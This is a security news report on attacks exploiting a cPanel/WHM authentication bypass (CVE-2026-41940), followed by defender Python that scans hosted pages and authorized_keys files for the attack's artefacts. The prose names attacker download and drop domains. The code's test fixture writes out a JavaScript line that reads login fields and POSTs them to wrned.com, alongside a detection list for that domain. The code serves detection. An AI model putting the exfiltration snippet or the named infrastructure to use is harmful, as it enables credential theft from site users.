A critical security flaw affecting cPanel and WebHost Manager (WHM) has been observed under active exploitation in global cyberattack campaigns, with the threat actor Mr_Rot13 linked to the deployment of a newly identified backdoor named Filemanager. The vulnerability, tracked as CVE-2026-41940, enables authentication bypass and allows remote attackers to gain elevated access to server control panels, giving them the ability to manipulate hosting environments at a privileged level. Security researchers report that exploitation activity began shortly after public disclosure of the flaw, with attackers rapidly integrating it into automated attack chains targeting exposed systems worldwide.
According to analysis from QiAnXin XLab, the vulnerability is being exploited by multiple threat actors across different regions, leading to a range of malicious outcomes including cryptocurrency mining, ransomware deployment, botnet expansion, and persistent backdoor installation. Monitoring data indicates that more than 2000 attacker-controlled IP addresses are currently participating in automated exploitation attempts. These sources are distributed globally, with significant activity originating from Germany, the United States, Brazil, the Netherlands and other regions. The widespread nature of the attacks highlights how quickly the vulnerability has been adopted within cybercrime ecosystems, where exposed hosting control panels are being systematically targeted for initial access.
The attack chain involves a multi-stage infection process that begins with shell scripts using wget or curl commands to retrieve a Go-based infector from a remote server identified as cp.dene.de.com. Once executed, the infector implants an attacker-controlled SSH public key into the targeted cPanel environment, establishing persistent access. It also deploys a PHP-based web shell capable of file upload, file download, and remote command execution, effectively granting full control over the compromised server. Following this, the web shell injects JavaScript code into hosted environments, serving a fake login interface designed to harvest credentials; the harvested credentials are encoded with the ROT13 cipher and transmitted to attacker-controlled infrastructure, specifically wrned.com. The attack chain ultimately results in deployment of a cross-platform backdoor capable of operating across Windows, macOS, and Linux systems, significantly expanding the scope of compromise beyond traditional hosting environments.
Further technical examination shows that the infector is also designed to collect sensitive system data from compromised hosts, including bash history files, SSH credentials, device identifiers, database passwords, and cPanel virtual aliases. This data is then transmitted to a Telegram group managed by an operator identified as 0xWR, indicating centralized coordination of stolen information. In parallel, the Filemanager backdoor is delivered through a separate shell script hosted on wpsock.com, providing attackers with file management capabilities, remote command execution, and interactive shell access for continued exploitation of infected systems. Researchers also identified long-term operational indicators suggesting that the actor behind this campaign, referred to as Mr_Rot13, has been active for several years, with infrastructure linked to the operation traced back to domains registered in 2020 and malicious components detected in samples dating as far back as 2022. Security telemetry further indicates that detection rates for related tooling and infrastructure have remained unusually low over a multi-year period, suggesting sustained stealth operations within compromised environments.
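As an added defender-side example (not code from the report or from QiAnXin XLab), the following Python checks two artefacts the attack chain described above leaves behind: a hosted page is scanned for ROT13-hidden credential strings and for contact with the wrned.com drop domain, and an authorized_keys file is compared against an allowlist to surface an implanted key. The sample script, the placeholder key blobs and the "hfre="/"cnff=" field layout are constructed assumptions for illustration.

```python
import codecs
import re
from urllib.parse import urlparse

# Drop domain named in the report, and words that mark a decoded literal as credential handling.
KNOWN_EXFIL_HOSTS = {"wrned.com"}
CREDENTIAL_WORDS = ("user", "pass", "login", "pwd", "token")
LITERAL_RE = re.compile(r'"([^"\\]*)"|' r"'([^'\\]*)'")
URL_RE = re.compile(r"""https?://[^\s"'<>]+""")

# Constructed sample of an injected script: "hfre"/"cnff" are ROT13 of "user"/"pass".
# The field layout is an assumption for illustration, not taken from the report.
SAMPLE_JS = r'''
var u = document.getElementById("user").value, p = document.getElementById("pass").value;
fetch("https://wrned.com/collect", {method: "POST", body: "hfre=" + rot(u) + "&cnff=" + rot(p)});
'''
# Constructed authorized_keys: one known admin key, one implanted key (placeholder blobs).
SAMPLE_KEYS = "ssh-ed25519 AAAAC3ADMINKEYPLACEHOLDER admin@host\nno-pty ssh-rsa AAAAB3IMPLANTEDKEYPLACEHOLDER\n"

def rot13(text):
    """ROT13 is its own inverse, so one helper both encodes and decodes."""
    return codecs.encode(text, "rot_13")

def scan_injected_script(js):
    """Surface ROT13-hidden credential strings and contact with known exfil hosts."""
    hits = []
    for m in LITERAL_RE.finditer(js):
        raw = m.group(1) if m.group(1) is not None else m.group(2)
        if raw:
            decoded = rot13(raw)
            if any(w in decoded.lower() for w in CREDENTIAL_WORDS):
                hits.append((raw, decoded))
    hosts = {h.lower() for h in (urlparse(u).hostname for u in URL_RE.findall(js)) if h}
    return {"rot13_hits": hits, "exfil_hosts": sorted(hosts & KNOWN_EXFIL_HOSTS)}

def unexpected_ssh_keys(authorized_keys, allowed_blobs):
    """Return authorized_keys entries whose key material is not on the allowlist."""
    unexpected = []
    for line in authorized_keys.splitlines():
        fields = line.split()
        if not fields or fields[0].startswith("#"):
            continue
        # Options (e.g. no-pty) may precede the key type; the base64 blob follows the type.
        for i, f in enumerate(fields[:-1]):
            if f.startswith(("ssh-", "ecdsa-", "sk-")):
                if fields[i + 1] not in allowed_blobs:
                    unexpected.append(line)
                break
    return unexpected
```

Run `scan_injected_script` over JavaScript served by a hosted site and `unexpected_ssh_keys` over each account's authorized_keys; both return empty results on clean input.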